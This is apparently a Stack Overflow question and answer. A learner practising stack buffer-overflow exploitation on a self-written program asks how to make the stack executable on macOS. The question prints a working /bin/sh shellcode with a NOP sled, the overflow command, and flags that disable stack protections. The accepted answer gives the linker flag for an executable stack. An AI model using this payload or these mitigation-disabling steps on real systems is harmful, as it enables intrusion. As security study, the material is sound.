# How can you make the stack executable on osx?

Tags: c, macos, security, gcc, shellcode

I'm currently going through "Hacking; the Art of Exploitation", and am practicing writing shell code injections on some example code I wrote up.

I'm injecting shell code as an environment variable. In lldb I can see that I am overwriting the return address, and that the EIP is being set to the middle of my NOP sled. However, it then throws "EXC_BAD_ACCESS" and segfaults.

Here's the part of the stack with my shellcode:

```
0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"
```

Calling `lldb ./notesearch $(perl -e 'print "\x5e\xfc\xff\xbf"x40')` to perform the buffer overflow, here's what we get when it segfaults:

```
Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
    frame #0: 0xbffffc5e
->  0xbffffc5e: nop    
    0xbffffc5f: nop    
    0xbffffc60: nop    
    0xbffffc61: nop
```

I'm using 
`gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer` 
to compile the code, and I'm using [change_mach_o_flags.py script](https://github.com/Tatsh/misc-scripts/blob/master/change-mach-o-flags) with the `--no-pie` and `--executable-heap` options set.

I *think* the problem is that osx automatically sets the stack to being non-executable. Unfortunately, there doesn't appear to be a `-z execstack` option for gcc in osx. There's also no `execstack` utility to use.

I've scoured the web and can't find anyway to make the stack executable in my compiled code. Is there a way to do this, and if so, how?

Comment: Hopefully, not in my lifetime. Have you yet tried placing a sofa on a railway to see what happens? Is this out of baleful curiosity, or malevolence?

Comment: @WeatherVane Uh oh. Is this that harmful? I'm just trying to make a contrived piece of vulnerable software with which I can get hands-on experience in shell code injection. Isn't trying to break your own code a pretty standard educational practice for people trying to learn about security?

Comment: Harmful? Unleash WW3? Better IMO to concentrate on making the code bullet proof. There is enough accidental input out there which you must guard against anyway. If you want to break your own code: do not leave it vulnerable, make it real world code that you would supply. *Then* try to break it with accidental or malicious or unexcpected input.

Comment: @Breezy I agree with you that from an educational standpoint there's a lot of value in learning these exploits. It's hard to guard against something you don't understand, and while most modern operating systems do make the stack non executable by default understanding stack exploits is helpful as stepping stone to understanding more complicated exploits.

Answer (score 6, accepted):

From the Apple developer documentation:

> There are two ways to make the stack and heap executable:
>
> Pass the -allow_stack_execute flag to the compiler. This makes the
>   stack (not the heap) executable.
>
> Use the mprotect system call to mark
>   specific memory pages as executable. The details are beyond the scope
>   of this document. For more information, see the manual page for
>   mprotect.

See more: https://developer.apple.com/library/content/documentation/Security/Conceptual/SecureCodingGuide/Articles/BufferOverflows.html

Comment: This worked perfectly. By adding `-Wl,-allow_stack_execute` to the flags in my gcc alias I was able to make the stack executable. Thanks!